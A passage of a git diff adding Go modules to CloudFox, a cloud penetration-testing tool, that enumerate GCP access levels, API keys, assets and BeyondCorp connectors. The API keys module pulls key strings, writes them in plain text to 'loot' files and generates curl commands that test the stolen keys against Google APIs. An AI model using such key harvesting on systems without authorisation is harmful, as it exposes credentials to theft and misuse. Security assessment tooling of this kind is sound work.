tables = append(tables, internal.TableFile{ + Name: "access-levels", + Header: header, + Body: body, + }) + + // Conditions detail table + var condBody [][]string + for _, level := range m.AccessLevels { + for i, cond := range level.Conditions { + ipRanges := strings.Join(cond.IPSubnetworks, ", ") + if len(ipRanges) > 40 { + ipRanges = ipRanges[:37] + "..." + } + if ipRanges == "" { + ipRanges = "(any)" + } + + members := strings.Join(cond.Members, ", ") + if len(members) > 40 { + members = members[:37] + "..." + } + if members == "" { + members = "(any)" + } + + regions := strings.Join(cond.Regions, ", ") + if regions == "" { + regions = "(any)" + } + + deviceReqs := "(none)" + if cond.DevicePolicy != nil { + var reqs []string + if cond.DevicePolicy.RequireScreenLock { + reqs = append(reqs, "screen-lock") + } + if cond.DevicePolicy.RequireCorpOwned { + reqs = append(reqs, "corp-owned") + } + if cond.DevicePolicy.RequireAdminApproval { + reqs = append(reqs, "admin-approval") + } + if len(reqs) > 0 { + deviceReqs = strings.Join(reqs, ", ") + } + } + + condBody = append(condBody, []string{ + level.Name, + fmt.Sprintf("%d", i+1), + ipRanges, + members, + regions, + deviceReqs, + }) + } + } + + if len(condBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "access-level-conditions", + Header: []string{"Level", "Condition", "IP Ranges", "Members", "Regions", "Device Requirements"}, + Body: condBody, + }) + } + + // High-risk findings + var highRiskBody [][]string + for _, level := range m.AccessLevels { + if level.RiskLevel == "HIGH" || level.RiskLevel == "MEDIUM" { + highRiskBody = append(highRiskBody, []string{ + level.Name, + level.Title, + level.RiskLevel, + strings.Join(level.RiskReasons, "; "), + }) + } + } + + if len(highRiskBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "access-level-risks", + Header: []string{"Name", "Title", "Risk Level", "Reasons"}, + Body: highRiskBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := AccessLevelsOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "org", []string{m.OrgID}, []string{m.OrgID}, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } +} diff --git a/gcp/commands/apikeys.go b/gcp/commands/apikeys.go new file mode 100644 index 00000000..9389e9b1 --- /dev/null +++ b/gcp/commands/apikeys.go @@ -0,0 +1,517 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + apikeysservice "github.com/BishopFox/cloudfox/gcp/services/apikeysService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPAPIKeysCommand = &cobra.Command{ + Use: globals.GCP_APIKEYS_MODULE_NAME, + Aliases: []string{"api-keys", "keys"}, + Short: "Enumerate GCP API keys with security analysis", + Long: `Enumerate GCP API keys with detailed security analysis. + +Features: +- Lists all API keys in the project +- Analyzes key restrictions (API, IP, referer, app) +- Retrieves key strings (if permissions allow) +- Identifies unrestricted or weakly restricted keys +- Flags old keys without rotation +- Shows API targets and access patterns +- Generates commands for testing key access`, + Run: runGCPAPIKeysCommand, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type APIKeysModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + APIKeys []apikeysservice.APIKeyInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type APIKeysOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o APIKeysOutput) TableFiles() []internal.TableFile { return o.Table } +func (o APIKeysOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPAPIKeysCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_APIKEYS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &APIKeysModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + APIKeys: []apikeysservice.APIKeyInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *APIKeysModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_APIKEYS_MODULE_NAME, m.processProject) + + // Check results + if len(m.APIKeys) == 0 { + logger.InfoM("No API keys found", globals.GCP_APIKEYS_MODULE_NAME) + return + } + + // Count findings + unrestricted := 0 + highRisk := 0 + withKeyStrings := 0 + for _, key := range m.APIKeys { + if key.IsUnrestricted { + unrestricted++ + } + if key.RiskLevel == "HIGH" { + highRisk++ + } + if key.KeyString != "" { + withKeyStrings++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d API key(s) (%d unrestricted, %d high-risk, %d with key strings)", + len(m.APIKeys), unrestricted, highRisk, withKeyStrings), globals.GCP_APIKEYS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *APIKeysModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating API keys in project: %s", projectID), globals.GCP_APIKEYS_MODULE_NAME) + } + + // Create service and fetch API keys + service := apikeysservice.New() + keys, err := service.ListAPIKeysWithKeyStrings(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating API keys in project %s: %v", projectID, err), globals.GCP_APIKEYS_MODULE_NAME) + } + return + } + + // Thread-safe append + m.mu.Lock() + m.APIKeys = append(m.APIKeys, keys...) + + // Generate loot for each API key + for _, key := range keys { + m.addAPIKeyToLoot(key) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d API key(s) in project %s", len(keys), projectID), globals.GCP_APIKEYS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *APIKeysModule) initializeLootFiles() { + m.LootMap["apikeys-all"] = &internal.LootFile{ + Name: "apikeys-all", + Contents: "# All API Keys\n# Generated by CloudFox\n# Format: key_string|project|name|restrictions\n\n", + } + m.LootMap["apikeys-unrestricted"] = &internal.LootFile{ + Name: "apikeys-unrestricted", + Contents: "# Unrestricted API Keys\n# Generated by CloudFox\n# WARNING: These keys have no restrictions!\n\n", + } + m.LootMap["apikeys-high-risk"] = &internal.LootFile{ + Name: "apikeys-high-risk", + Contents: "# High-Risk API Keys\n# Generated by CloudFox\n\n", + } + m.LootMap["apikeys-test-commands"] = &internal.LootFile{ + Name: "apikeys-test-commands", + Contents: "# API Key Test Commands\n# Generated by CloudFox\n# Use these to verify key access\n\n", + } + m.LootMap["apikeys-key-strings"] = &internal.LootFile{ + Name: "apikeys-key-strings", + Contents: "", + } +} + +func (m *APIKeysModule) addAPIKeyToLoot(key apikeysservice.APIKeyInfo) { + // Extract key ID from full name + keyID := extractKeyID(key.Name) + + // Key string file (just the values) + if key.KeyString != "" { + m.LootMap["apikeys-key-strings"].Contents += key.KeyString + "\n" + } + + // All keys with details + restrictions := "unrestricted" + if key.HasRestrictions { + restrictions = key.RestrictionType + if len(key.AllowedAPIs) > 0 { + restrictions += fmt.Sprintf(" (APIs: %s)", strings.Join(key.AllowedAPIs, ", ")) + } + } + m.LootMap["apikeys-all"].Contents += fmt.Sprintf( + "# Key: %s\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# Restrictions: %s\n"+ + "# Risk Level: %s\n", + keyID, + key.ProjectID, + key.DisplayName, + restrictions, + key.RiskLevel, + ) + if key.KeyString != "" { + m.LootMap["apikeys-all"].Contents += fmt.Sprintf("KEY_STRING=%s\n", key.KeyString) + } + m.LootMap["apikeys-all"].Contents += "\n" + + // Unrestricted keys + if key.IsUnrestricted { + m.LootMap["apikeys-unrestricted"].Contents += fmt.Sprintf( + "# Key: %s\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# Created: %s\n", + keyID, + key.ProjectID, + key.DisplayName, + key.CreateTime.Format("2006-01-02"), + ) + if key.KeyString != "" { + m.LootMap["apikeys-unrestricted"].Contents += fmt.Sprintf("KEY_STRING=%s\n", key.KeyString) + } + m.LootMap["apikeys-unrestricted"].Contents += "\n" + } + + // High-risk keys + if key.RiskLevel == "HIGH" { + m.LootMap["apikeys-high-risk"].Contents += fmt.Sprintf( + "# Key: %s\n"+ + "# Project: %s\n"+ + "# Risk Level: %s\n"+ + "# Reasons:\n", + keyID, + key.ProjectID, + key.RiskLevel, + ) + for _, reason := range key.RiskReasons { + m.LootMap["apikeys-high-risk"].Contents += fmt.Sprintf(" - %s\n", reason) + } + if key.KeyString != "" { + m.LootMap["apikeys-high-risk"].Contents += fmt.Sprintf("KEY_STRING=%s\n", key.KeyString) + } + m.LootMap["apikeys-high-risk"].Contents += "\n" + } + + // Test commands + if key.KeyString != "" { + m.LootMap["apikeys-test-commands"].Contents += fmt.Sprintf( + "# Test key: %s (Project: %s)\n"+ + "# Try accessing various APIs with this key:\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://maps.googleapis.com/maps/api/geocode/json?address=1600+Amphitheatre+Parkway'\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://translation.googleapis.com/language/translate/v2?q=Hello&target=es'\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://www.googleapis.com/customsearch/v1?q=test'\n\n", + keyID, + key.ProjectID, + key.KeyString, + key.KeyString, + key.KeyString, + ) + } +} + +// extractKeyID extracts the key ID from the full resource name +func extractKeyID(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main API keys table + keysHeader := []string{ + "Key ID", + "Display Name", + "Project", + "Restriction Type", + "API Targets", + "Age (days)", + "Risk", + "Has Key String", + } + + var keysBody [][]string + for _, key := range m.APIKeys { + keyID := extractKeyID(key.Name) + + restrictionType := key.RestrictionType + if restrictionType == "" { + restrictionType = "none" + } + + apiTargets := "-" + if len(key.AllowedAPIs) > 0 { + if len(key.AllowedAPIs) > 2 { + apiTargets = fmt.Sprintf("%s +%d more", strings.Join(key.AllowedAPIs[:2], ", "), len(key.AllowedAPIs)-2) + } else { + apiTargets = strings.Join(key.AllowedAPIs, ", ") + } + } + + age := "-" + if !key.CreateTime.IsZero() { + age = fmt.Sprintf("%d", int(time.Since(key.CreateTime).Hours()/24)) + } + + hasKeyString := "No" + if key.KeyString != "" { + hasKeyString = "Yes" + } + + keysBody = append(keysBody, []string{ + keyID, + key.DisplayName, + key.ProjectID, + restrictionType, + apiTargets, + age, + key.RiskLevel, + hasKeyString, + }) + } + + // Unrestricted keys table + unrestrictedHeader := []string{ + "Key ID", + "Display Name", + "Project", + "Created", + "Has Key String", + } + + var unrestrictedBody [][]string + for _, key := range m.APIKeys { + if key.IsUnrestricted { + keyID := extractKeyID(key.Name) + created := "-" + if !key.CreateTime.IsZero() { + created = key.CreateTime.Format("2006-01-02") + } + hasKeyString := "No" + if key.KeyString != "" { + hasKeyString = "Yes" + } + + unrestrictedBody = append(unrestrictedBody, []string{ + keyID, + key.DisplayName, + key.ProjectID, + created, + hasKeyString, + }) + } + } + + // Restrictions detail table + restrictionsHeader := []string{ + "Key ID", + "Project", + "Type", + "Allowed Values", + } + + var restrictionsBody [][]string + for _, key := range m.APIKeys { + if key.HasRestrictions { + keyID := extractKeyID(key.Name) + + // Add API restrictions + if len(key.AllowedAPIs) > 0 { + restrictionsBody = append(restrictionsBody, []string{ + keyID, + key.ProjectID, + "API", + strings.Join(key.AllowedAPIs, ", "), + }) + } + + // Add referer restrictions + if len(key.AllowedReferers) > 0 { + restrictionsBody = append(restrictionsBody, []string{ + keyID, + key.ProjectID, + "Referer", + strings.Join(key.AllowedReferers, ", "), + }) + } + + // Add IP restrictions + if len(key.AllowedIPs) > 0 { + restrictionsBody = append(restrictionsBody, []string{ + keyID, + key.ProjectID, + "IP", + strings.Join(key.AllowedIPs, ", "), + }) + } + + // Add Android app restrictions + if len(key.AllowedAndroidApps) > 0 { + restrictionsBody = append(restrictionsBody, []string{ + keyID, + key.ProjectID, + "Android", + strings.Join(key.AllowedAndroidApps, ", "), + }) + } + + // Add iOS app restrictions + if len(key.AllowedIOSApps) > 0 { + restrictionsBody = append(restrictionsBody, []string{ + keyID, + key.ProjectID, + "iOS", + strings.Join(key.AllowedIOSApps, ", "), + }) + } + } + } + + // High-risk keys table + highRiskHeader := []string{ + "Key ID", + "Project", + "Risk Level", + "Risk Reasons", + } + + var highRiskBody [][]string + for _, key := range m.APIKeys { + if key.RiskLevel == "HIGH" || key.RiskLevel == "MEDIUM" { + keyID := extractKeyID(key.Name) + highRiskBody = append(highRiskBody, []string{ + keyID, + key.ProjectID, + key.RiskLevel, + strings.Join(key.RiskReasons, "; "), + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "apikeys", + Header: keysHeader, + Body: keysBody, + }, + } + + // Add unrestricted keys table if there are any + if len(unrestrictedBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "apikeys-unrestricted", + Header: unrestrictedHeader, + Body: unrestrictedBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d unrestricted API key(s)!", len(unrestrictedBody)), globals.GCP_APIKEYS_MODULE_NAME) + } + + // Add restrictions table if there are any + if len(restrictionsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "apikeys-restrictions", + Header: restrictionsHeader, + Body: restrictionsBody, + }) + } + + // Add high-risk table if there are any + if len(highRiskBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "apikeys-high-risk", + Header: highRiskHeader, + Body: highRiskBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high/medium risk API key(s)", len(highRiskBody)), globals.GCP_APIKEYS_MODULE_NAME) + } + + output := APIKeysOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_APIKEYS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go new file mode 100644 index 00000000..bae744d0 --- /dev/null +++ b/gcp/commands/assetinventory.go @@ -0,0 +1,309 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + assetservice "github.com/BishopFox/cloudfox/gcp/services/assetService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var ( + assetTypes []string + showCounts bool + checkIAM bool +) + +var GCPAssetInventoryCommand = &cobra.Command{ + Use: globals.GCP_ASSET_INVENTORY_MODULE_NAME, + Aliases: []string{"assets", "inventory", "cai"}, + Short: "Enumerate Cloud Asset Inventory", + Long: `Enumerate resources using Cloud Asset Inventory API. + +Features: +- Lists all assets in a project +- Provides asset counts by type +- Can check IAM policies for public access +- Supports filtering by asset type + +Examples: + cloudfox gcp asset-inventory -p my-project + cloudfox gcp asset-inventory -p my-project --counts + cloudfox gcp asset-inventory -p my-project --iam + cloudfox gcp asset-inventory -p my-project --types compute.googleapis.com/Instance,storage.googleapis.com/Bucket`, + Run: runGCPAssetInventoryCommand, +} + +func init() { + GCPAssetInventoryCommand.Flags().StringSliceVar(&assetTypes, "types", []string{}, "Filter by asset types (comma-separated)") + GCPAssetInventoryCommand.Flags().BoolVar(&showCounts, "counts", false, "Show asset counts by type only") + GCPAssetInventoryCommand.Flags().BoolVar(&checkIAM, "iam", false, "Check IAM policies for public access") +} + +type AssetInventoryModule struct { + gcpinternal.BaseGCPModule + Assets []assetservice.AssetInfo + TypeCounts []assetservice.AssetTypeCount + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type AssetInventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AssetInventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AssetInventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPAssetInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ASSET_INVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &AssetInventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Assets: []assetservice.AssetInfo{}, + TypeCounts: []assetservice.AssetTypeCount{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *AssetInventoryModule) Execute(ctx context.Context, logger internal.Logger) { + if showCounts { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectCounts) + } else if checkIAM { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectIAM) + } else { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProject) + } + + if showCounts { + if len(m.TypeCounts) == 0 { + logger.InfoM("No assets found", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + return + } + logger.SuccessM(fmt.Sprintf("Found %d asset type(s)", len(m.TypeCounts)), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } else { + if len(m.Assets) == 0 { + logger.InfoM("No assets found", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + return + } + + publicCount := 0 + for _, asset := range m.Assets { + if asset.PublicAccess { + publicCount++ + } + } + + if checkIAM { + logger.SuccessM(fmt.Sprintf("Found %d asset(s) (%d with public access)", + len(m.Assets), publicCount), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d asset(s)", len(m.Assets)), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + } + + m.writeOutput(ctx, logger) +} + +func (m *AssetInventoryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + svc := assetservice.New() + assets, err := svc.ListAssets(projectID, assetTypes) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list assets: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Assets = append(m.Assets, assets...) + for _, asset := range assets { + m.addToLoot(asset) + } + m.mu.Unlock() +} + +func (m *AssetInventoryModule) processProjectIAM(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating assets with IAM in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + svc := assetservice.New() + assets, err := svc.ListAssetsWithIAM(projectID, assetTypes) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list assets with IAM: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Assets = append(m.Assets, assets...) + for _, asset := range assets { + m.addToLoot(asset) + } + m.mu.Unlock() +} + +func (m *AssetInventoryModule) processProjectCounts(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Counting assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + svc := assetservice.New() + counts, err := svc.GetAssetTypeCounts(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not count assets: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + return + } + + m.mu.Lock() + // Merge counts from multiple projects + countMap := make(map[string]int) + for _, c := range m.TypeCounts { + countMap[c.AssetType] = c.Count + } + for _, c := range counts { + countMap[c.AssetType] += c.Count + } + + m.TypeCounts = []assetservice.AssetTypeCount{} + for assetType, count := range countMap { + m.TypeCounts = append(m.TypeCounts, assetservice.AssetTypeCount{ + AssetType: assetType, + Count: count, + }) + } + m.mu.Unlock() +} + +func (m *AssetInventoryModule) initializeLootFiles() { + m.LootMap["asset-inventory"] = &internal.LootFile{ + Name: "asset-inventory", + Contents: "# Cloud Asset Inventory\n# Generated by CloudFox\n\n", + } + m.LootMap["public-assets"] = &internal.LootFile{ + Name: "public-assets", + Contents: "", + } +} + +func (m *AssetInventoryModule) addToLoot(asset assetservice.AssetInfo) { + m.LootMap["asset-inventory"].Contents += fmt.Sprintf( + "# Asset: %s\n# Type: %s\n# Project: %s\n# Location: %s\n\n", + asset.Name, asset.AssetType, asset.ProjectID, asset.Location) + + if asset.PublicAccess { + m.LootMap["public-assets"].Contents += fmt.Sprintf("%s (%s)\n", asset.Name, asset.AssetType) + } +} + +func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + if showCounts { + // Sort by count descending + sort.Slice(m.TypeCounts, func(i, j int) bool { + return m.TypeCounts[i].Count > m.TypeCounts[j].Count + }) + + header := []string{"Asset Type", "Count"} + var body [][]string + for _, tc := range m.TypeCounts { + body = append(body, []string{ + tc.AssetType, + fmt.Sprintf("%d", tc.Count), + }) + } + tables = append(tables, internal.TableFile{ + Name: "asset-counts", + Header: header, + Body: body, + }) + } else { + header := []string{"Name", "Asset Type", "Location", "Project"} + if checkIAM { + header = append(header, "IAM Bindings", "Public Access", "Risk") + } + + var body [][]string + for _, asset := range m.Assets { + row := []string{ + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + asset.ProjectID, + } + if checkIAM { + publicAccess := "No" + if asset.PublicAccess { + publicAccess = "Yes" + } + row = append(row, fmt.Sprintf("%d", asset.IAMBindings), publicAccess, asset.RiskLevel) + } + body = append(body, row) + } + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) + + // Public assets table (if checking IAM) + if checkIAM { + var publicBody [][]string + for _, asset := range m.Assets { + if asset.PublicAccess { + publicBody = append(publicBody, []string{ + asset.Name, + asset.AssetType, + asset.RiskLevel, + strings.Join(asset.RiskReasons, "; "), + asset.ProjectID, + }) + } + } + + if len(publicBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-assets", + Header: []string{"Name", "Asset Type", "Risk Level", "Reasons", "Project"}, + Body: publicBody, + }) + } + } + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := AssetInventoryOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } +} diff --git a/gcp/commands/beyondcorp.go b/gcp/commands/beyondcorp.go new file mode 100644 index 00000000..0ae626c1 --- /dev/null +++ b/gcp/commands/beyondcorp.go @@ -0,0 +1,183 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + beyondcorpservice "github.com/BishopFox/cloudfox/gcp/services/beyondcorpService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBeyondCorpCommand = &cobra.Command{ + Use: globals.GCP_BEYONDCORP_MODULE_NAME, + Aliases: []string{"bc", "zero-trust"}, + Short: "Enumerate BeyondCorp Enterprise configurations", + Long: `Enumerate BeyondCorp Enterprise configurations. + +Features: +- Lists app connectors and connections +- Analyzes connection endpoints +- Identifies configuration issues`, + Run: runGCPBeyondCorpCommand, +} + +type BeyondCorpModule struct { + gcpinternal.BaseGCPModule + AppConnectors []beyondcorpservice.AppConnectorInfo + AppConnections []beyondcorpservice.AppConnectionInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type BeyondCorpOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BeyondCorpOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BeyondCorpOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBeyondCorpCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BEYONDCORP_MODULE_NAME) + if err != nil { + return + } + + module := &BeyondCorpModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + AppConnectors: []beyondcorpservice.AppConnectorInfo{}, + AppConnections: []beyondcorpservice.AppConnectionInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BeyondCorpModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BEYONDCORP_MODULE_NAME, m.processProject) + + totalCount := len(m.AppConnectors) + len(m.AppConnections) + if totalCount == 0 { + logger.InfoM("No BeyondCorp resources found", globals.GCP_BEYONDCORP_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d connector(s), %d connection(s)", + len(m.AppConnectors), len(m.AppConnections)), + globals.GCP_BEYONDCORP_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *BeyondCorpModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating BeyondCorp in project: %s", projectID), globals.GCP_BEYONDCORP_MODULE_NAME) + } + + svc := beyondcorpservice.New() + + // Get app connectors + connectors, _ := svc.ListAppConnectors(projectID) + m.mu.Lock() + m.AppConnectors = append(m.AppConnectors, connectors...) + m.mu.Unlock() + + // Get app connections + connections, _ := svc.ListAppConnections(projectID) + m.mu.Lock() + m.AppConnections = append(m.AppConnections, connections...) + m.mu.Unlock() + + m.mu.Lock() + for _, conn := range connections { + m.addConnectionToLoot(conn) + } + m.mu.Unlock() +} + +func (m *BeyondCorpModule) initializeLootFiles() { + m.LootMap["beyondcorp-connections"] = &internal.LootFile{ + Name: "beyondcorp-connections", + Contents: "# BeyondCorp Connections\n# Generated by CloudFox\n\n", + } + m.LootMap["beyondcorp-endpoints"] = &internal.LootFile{ + Name: "beyondcorp-endpoints", + Contents: "", + } +} + +func (m *BeyondCorpModule) addConnectionToLoot(conn beyondcorpservice.AppConnectionInfo) { + m.LootMap["beyondcorp-connections"].Contents += fmt.Sprintf( + "# Connection: %s\n# Endpoint: %s\n# Gateway: %s\n# Connectors: %s\n\n", + conn.Name, conn.ApplicationEndpoint, conn.Gateway, strings.Join(conn.Connectors, ", ")) + + if conn.ApplicationEndpoint != "" { + m.LootMap["beyondcorp-endpoints"].Contents += fmt.Sprintf("%s # %s\n", conn.ApplicationEndpoint, conn.Name) + } +} + +func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // App Connectors table + if len(m.AppConnectors) > 0 { + header := []string{"Name", "Location", "State", "Service Account", "Risk", "Project"} + var body [][]string + for _, connector := range m.AppConnectors { + body = append(body, []string{ + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + connector.RiskLevel, + connector.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "beyondcorp-connectors", + Header: header, + Body: body, + }) + } + + // App Connections table + if len(m.AppConnections) > 0 { + header := []string{"Name", "Location", "State", "Endpoint", "Gateway", "Risk", "Project"} + var body [][]string + for _, conn := range m.AppConnections { + body = append(body, []string{ + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + conn.RiskLevel, + conn.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "beyondcorp-connections", + Header: header, + Body: body, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := 